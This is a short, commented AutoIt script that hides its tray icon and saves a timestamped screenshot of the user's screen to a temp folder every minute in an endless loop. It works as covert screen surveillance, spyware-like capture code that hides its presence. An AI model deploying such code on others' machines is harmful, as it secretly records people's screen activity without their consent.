>#NoTrayIcon ; <== Disabling Tray Icon
#Include
DirCreate(@TempDir & "\Screenshots") ; <== Creating "Screenshots" dir in %Temp%
While (1) ; <== Infinity loop
$i = @HOUR & "_" & @MIN & "(" & @MDAY & "_" & @MON & "_" & @YEAR & ")" ; <== Redefinition the variable
_ScreenCapture_Capture(@TempDir & "\Screenshots\" & $i & ".jpg") ; <== Creating screenshot and placing it into %Temp% \Screenshots)
Sleep(60 * 1000) ; <== Its 1 minute xD
WEnd